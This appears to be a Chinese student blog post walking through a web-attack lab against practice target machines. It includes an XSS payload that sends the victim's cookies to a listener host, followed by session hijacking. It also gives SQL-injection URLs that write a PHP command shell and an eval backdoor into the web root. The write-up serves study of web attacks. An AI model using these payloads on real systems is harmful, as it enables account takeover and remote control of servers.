web 攻击靶机解题过程

 

 

 

sql注入靶机攻击过程请参考

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

xss靶机的攻击过程请参考

https://pentesterlab.com/exercises/xss_and_mysql_file/course

实验一

 

实验二

 

在机器上打开网页:

测试下是否存在xss漏洞。

发现提交后有弹出框:

 

 

进一步构造内容

<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+'  "/>');</script> 同时在192.168.179.142机器上用nc打开80端口。

 在原来机器上登陆admin账户,密码是p4ssw0rd

 

 

获取到cookie信息。

复制下cookie,在142机器上打开评论所在的网页。并修改cookie的值为刚才复制的值。

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

 

 

 

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

 

 

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.179.130/css/s.php

显示:

说明s.php文件成功写入到/var/www/css 目录,下面将

<?php system($_GET['c']); ?>

写入z.php中,构造url为:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

下面写入一句话木马,构造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

 

 

posted @ 2018-10-23 09:37  P201521450010  阅读(132)  评论(0编辑  收藏  举报